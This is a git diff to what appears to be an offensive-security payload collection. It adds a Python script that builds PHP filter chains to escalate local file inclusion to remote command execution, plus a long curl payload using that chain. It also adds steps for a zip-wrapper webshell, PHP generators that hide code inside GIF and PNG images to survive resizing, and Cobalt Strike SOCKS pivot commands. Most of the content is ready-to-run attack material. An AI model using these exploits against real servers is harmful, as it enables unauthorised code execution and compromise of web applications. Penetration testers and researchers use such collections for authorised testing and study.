diff --git a/File Inclusion/LFI2RCE.py b/File Inclusion/LFI2RCE.py new file mode 100644 index 0000000..3943715 --- /dev/null +++ b/File Inclusion/LFI2RCE.py @@ -0,0 +1,60 @@ +import requests + +url = "http://localhost:8000/chall.php" +file_to_use = "/etc/passwd" +command = "id" + +# +base64_payload = "PD89YCRfR0VUWzBdYDs7Pz4" + +conversions = { + 'R': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2', + 'B': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2', + 'C': 'convert.iconv.UTF8.CSISO2022KR', + '8': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2', + '9': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB', + 'f': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.SHIFTJISX0213', + 's': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61', + 'z': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS', + 'U': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932', + 'P': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213', + 'V': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5', + '0': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2', + 'Y': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2', + 'W': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.851.UTF8|convert.iconv.L7.UCS2', + 'd': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2', + 'D': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2', + '7': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2', + '4': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2' +} + + +# generate some garbage base64 +filters = "convert.iconv.UTF8.CSISO2022KR|" +filters += "convert.base64-encode|" +# make sure to get rid of any equal signs in both the string we just generated and the rest of the file +filters += "convert.iconv.UTF8.UTF7|" + + +for c in base64_payload[::-1]: + filters += conversions[c] + "|" + # decode and reencode to get rid of everything that isn't valid base64 + filters += "convert.base64-decode|" + filters += "convert.base64-encode|" + # get rid of equal signs + filters += "convert.iconv.UTF8.UTF7|" + +filters += "convert.base64-decode" + +final_payload = f"php://filter/{filters}/resource={file_to_use}" + +with open('payload', 'w') as f: + f.write(final_payload) + +r = requests.get(url, params={ + "0": command, + "action": "include", + "file": final_payload +}) + +print(r.text) \ No newline at end of file diff --git a/File Inclusion/README.md b/File Inclusion/README.md index b1a9170..f6bfef4 100644 --- a/File Inclusion/README.md +++ b/File Inclusion/README.md @@ -140,7 +140,7 @@ http://example.com/index.php?page=php://filter/convert.base64-encode/resource=in http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php ``` -can be chained with a compression wrapper for large files. +Wrappers can be chained with a compression wrapper for large files. ```powershell http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd @@ -155,16 +155,28 @@ NOTE: Wrappers can be chained multiple times using `|` or `/`: curl "http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php" | base64 -d > index.php ``` +Also there is a way to turn the `php://filter` into a full RCE. Use [LFI2RCE.py](./LFI2RCE.py) to generate a custom payload. + +```powershell +# vulnerable file: index.php +# vulnerable parameter: file +# executed command: id +# executed PHP code: +curl "127.0.0.1:8000/index.php?0=id&file=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.851.UTF8|convert.iconv.L7.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.SHIFTJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=/etc/passwd" +``` + + ### Wrapper zip:// -```python -echo "
" > payload.php; -zip payload.zip payload.php; -mv payload.zip shell.jpg; -rm payload.php +1. Create an evil payload: `echo "
" > payload.php;` +2. Zip the file + ```python + zip payload.zip payload.php; + mv payload.zip shell.jpg; + rm payload.php + ``` +3. Upload the archive and access the file using the wrappers: http://example.com/index.php?page=zip://shell.jpg%23payload.php -http://example.com/index.php?page=zip://shell.jpg%23payload.php -``` ### Wrapper data:// @@ -175,6 +187,7 @@ NOTE: the payload is "" Fun fact: you can trigger an XSS and bypass the Chrome Auditor with : `http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+` + ### Wrapper expect:// ```powershell @@ -182,6 +195,7 @@ http://example.com/index.php?page=expect://id http://example.com/index.php?page=expect://ls ``` + ### Wrapper input:// Specify your payload in the POST parameters, this can be done with a simple `curl` command. @@ -196,6 +210,7 @@ Alternatively, Kadimus has a module to automate this attack. ./kadimus -u "https://example.com/index.php?page=php://input%00" -C '' -T input ``` + ### Wrapper phar:// Create a phar file with a serialized object in its meta-data. @@ -229,6 +244,7 @@ include('phar://test.phar'); NOTE: The unserialize is triggered for the phar:// wrapper in any file operation, `file_exists` and many more. + ## LFI to RCE via /proc/*/fd 1. Upload a lot of shells (for example : 100) @@ -243,6 +259,7 @@ GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1 User-Agent: ``` + ## LFI to RCE via upload If you can upload a file, just inject the shell payload in it (e.g : `` ). @@ -253,6 +270,7 @@ http://example.com/index.php?page=path/to/uploaded/file.png In order to keep the file readable it is best to inject into the metadata for the pictures/doc/pdf + ## LFI to RCE via upload (race) Worlds Quitest Let's Play" * Upload a file and trigger a self-inclusion. @@ -456,3 +474,5 @@ If SSH is active check which user is being used `/proc/self/status` and `/etc/pa * [Exploiting Remote File Inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction](http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html?m=1) * [PHP LFI with Nginx Assistance](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/) * [PHP LFI to arbitrary code execution via rfc1867 file upload temporary files (EN) - gynvael.coldwind - 2011-03-18](https://gynvael.coldwind.pl/?id=376) +* [LFI2RCE via PHP Filters - HackTricks](https://book.hacktricks.xyz/pentesting-web/file-inclusion/lfi2rce-via-php-filters) +* [Solving "includer's revenge" from hxp ctf 2021 without controlling any files - @loknop](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d) diff --git a/Methodology and Resources/Cobalt Strike - Cheatsheet.md b/Methodology and Resources/Cobalt Strike - Cheatsheet.md index affccdb..e84435c 100644 --- a/Methodology and Resources/Cobalt Strike - Cheatsheet.md +++ b/Methodology and Resources/Cobalt Strike - Cheatsheet.md @@ -337,6 +337,11 @@ Opsec safe Pass-the-Hash: ```powershell # Start a SOCKS server on the given port on your teamserver, tunneling traffic through the specified Beacon. Set the teamserver/port configuration in /etc/proxychains.conf for easy usage. beacon > socks [PORT] +beacon > socks [port] +beacon > socks [port] [socks4] +beacon > socks [port] [socks5] +beacon > socks [port] [socks5] [enableNoAuth|disableNoAuth] [user] [password] +beacon > socks [port] [socks5] [enableNoAuth|disableNoAuth] [user] [password] [enableLogging|disableLogging] # Proxy browser traffic through a specified Internet Explorer process. beacon > browserpivot [pid] [x86|x64] diff --git a/Upload Insecure Files/Picture Resize/GIF_exploit.gif b/Upload Insecure Files/Picture Compression/GIF_exploit.gif similarity index 100% rename from Upload Insecure Files/Picture Resize/GIF_exploit.gif rename to Upload Insecure Files/Picture Compression/GIF_exploit.gif diff --git a/Upload Insecure Files/Picture Resize/JPG_exploit-55.jpg b/Upload Insecure Files/Picture Compression/JPG_exploit-55.jpg similarity index 100% rename from Upload Insecure Files/Picture Resize/JPG_exploit-55.jpg rename to Upload Insecure Files/Picture Compression/JPG_exploit-55.jpg diff --git a/Upload Insecure Files/Picture Resize/PNG_110x110_resize_bypass_use_LFI.png b/Upload Insecure Files/Picture Compression/PNG_110x110_resize_bypass_use_LFI.png similarity index 100% rename from Upload Insecure Files/Picture Resize/PNG_110x110_resize_bypass_use_LFI.png rename to Upload Insecure Files/Picture Compression/PNG_110x110_resize_bypass_use_LFI.png diff --git a/Upload Insecure Files/Picture Resize/PNG_32x32_resize_bypass_use_LFI.png b/Upload Insecure Files/Picture Compression/PNG_32x32_resize_bypass_use_LFI.png similarity index 100% rename from Upload Insecure Files/Picture Resize/PNG_32x32_resize_bypass_use_LFI.png rename to Upload Insecure Files/Picture Compression/PNG_32x32_resize_bypass_use_LFI.png diff --git a/Upload Insecure Files/Picture Resize/exploit_JPG.py b/Upload Insecure Files/Picture Compression/createBulletproofJPG.py similarity index 97% rename from Upload Insecure Files/Picture Resize/exploit_JPG.py rename to Upload Insecure Files/Picture Compression/createBulletproofJPG.py index 14b8a09..c3e2bbb 100644 --- a/Upload Insecure Files/Picture Resize/exploit_JPG.py +++ b/Upload Insecure Files/Picture Compression/createBulletproofJPG.py @@ -1,7 +1,6 @@ #!/usr/bin/python """ - Bulletproof Jpegs Generator Copyright (C) 2012 Damien "virtualabs" Cauquil @@ -18,7 +17,11 @@ You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. - + + ------------- + # How to use + b.php?c=ls + Source: http://www.virtualabs.fr/Nasty-bulletproof-Jpegs-l """ from __future__ import print_function diff --git a/Upload Insecure Files/Picture Resize/exploit_PNG_110x110.php b/Upload Insecure Files/Picture Compression/createCompressedPNG_110x110.php similarity index 100% rename from Upload Insecure Files/Picture Resize/exploit_PNG_110x110.php rename to Upload Insecure Files/Picture Compression/createCompressedPNG_110x110.php diff --git a/Upload Insecure Files/Picture Compression/createGIFwithGlobalColorTable.php b/Upload Insecure Files/Picture Compression/createGIFwithGlobalColorTable.php new file mode 100644 index 0000000..d505461 --- /dev/null +++ b/Upload Insecure Files/Picture Compression/createGIFwithGlobalColorTable.php @@ -0,0 +1,22 @@ +"; +$_width=200; +$_height=200; +if(strlen($_payload)%3!=0){ + echo "payload%3==0 !"; exit(); +} +$im = imagecreate($_width, $_height); +$_hex=unpack('H*',$_payload); + +$colors_hex=str_split($_hex[1], 6); + +for($i=0; $i < count($colors_hex); $i++){ + $_color_chunks=str_split($colors_hex[$i], 2); + $color=imagecolorallocate($im,hexdec($_color_chunks[0]),hexdec($_color_chunks[1]),hexdec($_color_chunks[2])); + imagesetpixel($im,$i,1,$color); +} + +imagegif($im,$_file); +?> \ No newline at end of file diff --git a/Upload Insecure Files/Picture Compression/createPNGwithPLTE.php b/Upload Insecure Files/Picture Compression/createPNGwithPLTE.php new file mode 100644 index 0000000..d5abcb7 --- /dev/null +++ b/Upload Insecure Files/Picture Compression/createPNGwithPLTE.php @@ -0,0 +1,28 @@ + "; +$_pay_len=strlen($_payload); +if(strlen($_payload)%3!=0){ + echo "payload%3==0 !"; exit(); +} + + +$width=$_pay_len/3; +$height=20; +//$im = imageCreateFromPng("existing.png"); +$im = imagecreate($width, $height); + +$_hex=unpack('H*',$_payload); +$_chunks=str_split($_hex[1], 6); + +for($i=0; $i < count($_chunks); $i++){ + + $_color_chunks=str_split($_chunks[$i], 2); + $color=imagecolorallocate($im,hexdec($_color_chunks[0]),hexdec($_color_chunks[1]),hexdec($_color_chunks[2])); + + imagesetpixel($im,$i,1,$color); + +} + +imagepng($im,"example.png"); \ No newline at end of file diff --git a/Upload Insecure Files/Picture Resize/README.txt b/Upload Insecure Files/Picture Resize/README.txt deleted file mode 100644 index 633f383..0000000 --- a/Upload Insecure Files/Picture Resize/README.txt +++ /dev/null @@ -1,5 +0,0 @@ -# How to use -b.php?c=ls - - -Source: http://www.virtualabs.fr/Nasty-bulletproof-Jpegs-l \ No newline at end of file diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md index 3f5bfba..585939a 100644 --- a/Upload Insecure Files/README.md +++ b/Upload Insecure Files/README.md @@ -9,7 +9,7 @@ * [Defaults extensions](#defaults-extensions) * [Upload tricks](#upload-tricks) * [Filename vulnerabilities](#filename-vulnerabilities) - * [Picture upload with LFI](#picture-upload-with-lfi) + * [Picture compression](#picture-compression-) * [Configuration Files](#configuration-files) * [CVE - Image Tragik](#cve---image-tragik) * [CVE - FFMpeg](#cve---ffmpeg) @@ -107,12 +107,16 @@ Also you upload: - HTML/SVG files to trigger an XSS - EICAR file to check the presence of an antivirus -### Picture upload with LFI +### Picture Compression -Valid pictures hosting PHP code. Upload the picture and use a **Local File Inclusion** to execute the code. The shell can be called with the following command : `curl 'http://localhost/test.php?0=system' --data "1='ls'"`. +Create valid pictures hosting PHP code. Upload the picture and use a **Local File Inclusion** to execute the code. The shell can be called with the following command : `curl 'http://localhost/test.php?0=system' --data "1='ls'"`. - Picture Metadata, hide the payload inside a comment tag in the metadata. - Picture Resize, hide the payload within the compression algorithm in order to bypass a resize. Also defeating `getimagesize()` and `imagecreatefromgif()`. + - [JPG](https://virtualabs.fr/Nasty-bulletproof-Jpegs-l): use createBulletproofJPG.py + - [PNG](https://blog.isec.pl/injection-points-in-popular-image-formats/): use createPNGwithPLTE.php + - [GIF](https://blog.isec.pl/injection-points-in-popular-image-formats/): use createGIFwithGlobalColorTable.php + ### Picture with custom metadata @@ -198,4 +202,5 @@ Upload the XML file to `$JETTY_BASE/webapps/` * [File Upload - Mahmoud M. Awali / @0xAwali](https://docs.google.com/presentation/d/1-YwXl9rhzSvvqVvE_bMZo2ab-0O5wRNTnzoihB9x6jI/edit#slide=id.ga2ef157b83_1_0) * [IIS - SOAP](https://red.0xbad53c.com/red-team-operations/initial-access/webshells/iis-soap) * [Arbitrary File Upload Tricks In Java - pyn3rd](https://pyn3rd.github.io/2022/05/07/Arbitrary-File-Upload-Tricks-In-Java/) -* [File Upload - HackTricks](https://book.hacktricks.xyz/pentesting-web/file-upload) \ No newline at end of file +* [File Upload - HackTricks](https://book.hacktricks.xyz/pentesting-web/file-upload) +* [Injection points in popular image formats - Daniel Kalinowski‌‌ - Nov 8, 2019](https://blog.isec.pl/injection-points-in-popular-image-formats/) \ No newline at end of file